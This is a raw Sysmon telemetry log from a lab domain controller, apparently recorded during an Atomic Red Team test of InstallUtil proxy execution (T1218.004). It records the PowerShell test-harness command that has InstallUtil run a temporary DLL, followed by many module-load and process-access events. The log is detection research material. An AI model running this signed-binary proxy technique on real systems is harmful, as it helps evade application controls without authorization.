ystem.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 154100x800000000000000057595792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:25:01.011{8B6011A9-A36D-618E-99FC-04000000F101}9496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false /installtype=notransaction /action=install C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A36C-618E-94FC-04000000F101}9108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false /installtype=notransaction /action=install `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_Install_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 534500x800000000000000057597859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.795{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 734700x800000000000000057597858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.779{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\601bda4ba29a8d6b7b125b94c2697c8b\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=7372BB83C92065CC175F5B104E9A505D,SHA256=56381C9335A77E1478F8F27DBB70D877FD443C41210E6F6D6E34FFDB3E5DE463false-Unavailable 734700x800000000000000057597857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.779{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System\2c8d66b5ef1d563cf9010bf4428ff9d2\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=88C6A31917BA9F2506E523DA037CC8DF,SHA256=15CD43739560489AEC0A752ACF5403A467319AC8E978DE279C702C74E792C5F2false-Unavailable 734700x800000000000000057597856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.686{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValid 734700x800000000000000057597855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.686{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValid 734700x800000000000000057597854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.670{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=057E8B1C10BCFC56E238FFC109C7A01E,SHA256=E164F2C2B70575ECF5C8B266E84A6C3236C18A6F09AE09A99F59AC6B0AEAF8E8trueMicrosoft CorporationValid 734700x800000000000000057597853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.670{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=2BDBEE1B42063F245AC86F54C236BC4E,SHA256=CD558E008DA76E171FC9B8CF87556353330D7B7BF593B5074E4FEB08BC14CFC6trueMicrosoft WindowsValid 734700x800000000000000057597852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.654{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7ded6822b7c67ccde0dc9249bee0271b\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=7BF3C3EF641852F9D4CCF7E80B1AFF13,SHA256=C7054ABC20409CCC86D1EF10E8B11369937FB5E81DFD9F15B31639071036CA9FtrueMicrosoft CorporationValid 734700x800000000000000057597847Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.311{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValid 734700x800000000000000057597846Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.311{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=BFE20E1D9BEBE61CD8898663FDACB74E,SHA256=AA416A9E707BE8475051FF502D20077A687D14CF3ABABF4959F489A3B5BFBF8BtrueMicrosoft CorporationValid 734700x800000000000000057597845Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.311{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=071309BE821483287A0FE982AEF005C1,SHA256=932920FE06897C0B2ADAF7FA855E3B45498D213994E81AB8694D9EE5CA53AC0AtrueMicrosoft CorporationValid 13241300x800000000000000057597844Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:27:23.311{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ea-0x8ddd0a25) 734700x800000000000000057597842Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.311{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=9C0F4F0DC954D96E7D70E5FBD85D7EE6,SHA256=A4C9BBF0836A49DADBDD87ED8372D290CCC0A0177B0D4B484AD18DC9C7BCC073trueMicrosoft CorporationValid 734700x800000000000000057597841Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.217{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValid 734700x800000000000000057597840Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.217{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValid 734700x800000000000000057597839Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.217{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValid 734700x800000000000000057597838Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.217{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValid 734700x800000000000000057597837Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.203{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValid 734700x800000000000000057597836Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.203{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F7E6254059E93E3FBD7FE0E3C5615605,SHA256=1AD1D4229C9FF3B4D041E4B4973A83BE2078EECD11E9EC00E4C0B42EAB20E07AtrueMicrosoft WindowsValid 734700x800000000000000057597835Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.186{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValid 734700x800000000000000057597834Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.170{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValid 734700x800000000000000057597833Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.170{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=6FDB4F1612AC70891B9F6E6005AA5DDB,SHA256=6DFEC2EE6E2A7CB4409AB824737A3657E6D66E309AFE83C28E0CE0676687F737trueMicrosoft WindowsValid 734700x800000000000000057597832Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.154{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValid 734700x800000000000000057597831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.139{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=606B77C072A964DA4E4710151CAC86EB,SHA256=C6C9E8D77B62C7A52E6E9EAC764C1E1345779FC17544B80730E507627A5D5120trueMicrosoft CorporationValid 734700x800000000000000057597830Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.139{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=D1F45F71014220112988A7BF64EE83EE,SHA256=60E8C6D420FC4AFF309FE9CB53327D8DC4EC541F627E4461C465561512D1ED5DtrueMicrosoft WindowsValid 734700x800000000000000057597829Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.123{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValid 734700x800000000000000057597828Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.123{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=580643DD40890B231399EA5F57EFAA70,SHA256=0B374B1825ABFF7B26170E75F1B638DF08A15B07660A7DF5533F02853CF266C6trueMicrosoft WindowsValid 734700x800000000000000057597827Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.109{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=990CA13B9FE19A5A611F77B333BC9AAD,SHA256=EC3960CAABA4FC0287601311BDCC14D472A165DA7C43F88665D984CE1A0B7DE4trueMicrosoft WindowsValid 734700x800000000000000057597826Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.109{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=3394E4EEB4851D80DD7548EC87EAEA5F,SHA256=7F670ACCE58EAADE796FEF335B4EAEAB66DFC47875219B9BE3C9B405A452450BtrueMicrosoft WindowsValid 734700x800000000000000057597825Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.109{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValid 734700x800000000000000057597824Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.092{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A1EDD29F959E38F8AE4AF9B5CDD2B534,SHA256=CE5ECDC3BEFA2DC8C826A697EAC6CDAC12753258315701130CDEDB19D24DBC75trueMicrosoft WindowsValid 10341000x800000000000000057597823Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.092{8B6011A9-EC34-6172-7AB6-01000000F101}931610168C:\Windows\system32\conhost.exe{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057597822Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.077{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=E3B7B5531159A395AC63B7EA256FE7B6,SHA256=B631E93E271E706E0204B606D7851ADF7E65FCA04ACDD73103F0754A9C01007EtrueMicrosoft WindowsValid 734700x800000000000000057597821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.061{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057597820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.061{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=2582AA6C1F88D34B37B7F82D790D232E,SHA256=AA948BB6583057E2E2F299EBD1717A42D6559CA27AF6BC756D3C3BB4109E4E77trueMicrosoft WindowsValid 734700x800000000000000057597819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.061{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValid 734700x800000000000000057597818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.061{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057597817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.061{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057597816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.061{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057597815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.045{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057597814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.045{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValid 734700x800000000000000057597813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.045{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValid 734700x800000000000000057597812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.045{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4EA36017E45CC2C5D3D2EABEFBE25941,SHA256=6E96551961497DBE66E0329711E4AC670713DF9315B948D7CB5EEAE8C757292FtrueMicrosoft WindowsValid 734700x800000000000000057597811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:27:23.029{8B6011A9-A3FB-618E-AFFC-04000000F101}3264C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 